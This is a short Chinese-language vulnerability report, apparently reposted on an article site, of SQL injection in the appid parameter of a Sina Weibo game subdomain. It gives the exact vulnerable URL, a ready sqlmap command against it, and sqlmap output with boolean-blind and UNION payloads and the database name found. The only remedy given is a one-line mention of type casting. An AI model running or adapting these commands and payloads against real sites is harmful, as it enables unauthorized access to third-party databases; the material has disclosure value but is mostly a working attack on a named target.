新浪微博某分站存在SQL注入(可UNION)

程序员文章站 2022-06-27 17:49:14

新浪微博某分站存在SQL注入(可UNION) # 网站 https://game.weibo.com # 注入点，参数appid https://game.weibo.com/webg...

# 网站

https://game.weibo.com

# 注入点，参数appid

https://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888

python sqlmap.py -u "https://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888" -p appid --dbs

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: appid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: callback=callback1&appid=3031123572' AND 5987=5987 AND 'EGPq'='EGPq&_=1464667300888

    Type: UNION query
    Title: MySQL UNION query (80) - 13 columns
    Payload: callback=callback1&appid=3031123572' UNION ALL SELECT 80,80,80,80,80,80,CONCAT(0x71787a7171,0x4f6b476570785a737754,0x716b706a71),80,80,80,80,80,80#&_=1464667300888
---
[22:02:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5

available databases [1]:
[*] app_vgwebgame

解决方案：

强制类型转换

上一篇：搜狗某站任意文件读取

下一篇： docker灵活的构建PHP环境的实现

新浪微博某分站存在SQL注入(可UNION)

解决方案：

新浪微博某分站存在SQL注入(可UNION)

新浪微博某分站SQL注入一枚

新浪微博某分站存在SQL注入(可UNION)